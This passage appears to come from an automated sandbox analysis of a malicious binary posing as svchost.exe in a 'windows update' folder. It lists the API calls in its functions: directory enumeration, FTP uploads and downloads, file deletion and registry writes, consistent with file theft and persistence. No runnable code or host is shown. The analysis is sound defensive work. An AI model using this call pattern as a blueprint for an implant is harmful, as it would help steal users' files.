?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@s4_2_00672687
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00671E79 fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,memset,feof,fclose,fclose,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_00671E79
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006724F0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?1_2_006724F0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006728A7 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,memset,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,RegOpenKeyExA,RegSetValueExA,RegCloseKe1_2_006728A7
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00671CB0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpGetFileA,memset,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fopen,fopen,fopen,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,memset,feof,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fclose,fclose,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fopen,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_00671CB0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006725B9 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$bas1_2_006725B9
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00672687 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@s1_2_00672687
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00671A80 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fopen,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fgetc,fputc,fclose,fclose,fclose,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_00671A80
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00673B90 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpGetFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fopen,fopen,memset,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fgetc,fprintf,feof,fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,fprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,memset,feof,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,fclose,fclose,fclose,FtpPutFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpGetFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fopen,fopen,memset,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fgetc,feof,fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,memset,feof,fprintf,fprintf,fprintf,fprintf,fclose,fclose,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,DeleteFileA,DeleteFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fopen,fprintf,fprintf,fprintf,fprintf,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_00673B90
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00671E79 fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,memset,feof,fclose,fclose,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,4_2_00671E79
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006724F0 